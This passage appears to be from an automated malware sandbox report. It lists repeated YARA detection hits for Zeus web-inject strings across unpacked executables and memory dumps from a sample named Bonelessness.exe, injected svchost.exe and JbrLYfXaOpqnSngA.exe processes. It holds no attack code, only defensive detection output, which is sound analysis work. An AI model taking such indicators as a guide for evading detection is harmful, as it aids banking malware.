      Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.2.Bonelessness.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.2.Bonelessness.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.44.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2606000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2570000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.44.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2606c00.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.3.Bonelessness.exe.868460.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.8.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.a00000.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0.3.Bonelessness.exe.86e060.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.a00000.45.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.24c2000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.2d20000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.2601000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.3c60000.7.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.2515c00.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.2515c00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.a00000.46.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.43.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.2.svchost.exe.2d20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 1.3.svchost.exe.39e0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2056864277.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2658112524.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2089951115.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2092414435.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2076160322.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2100192299.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2013590988.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2104389897.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2657998590.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2092245868.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2049697984.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2106348452.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2100466451.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2104185597.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2086934819.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2107336667.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2091862945.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2011412007.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2072543768.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2052599017.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2086358360.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2091561491.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2010460715.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2025731561.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2104048966.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
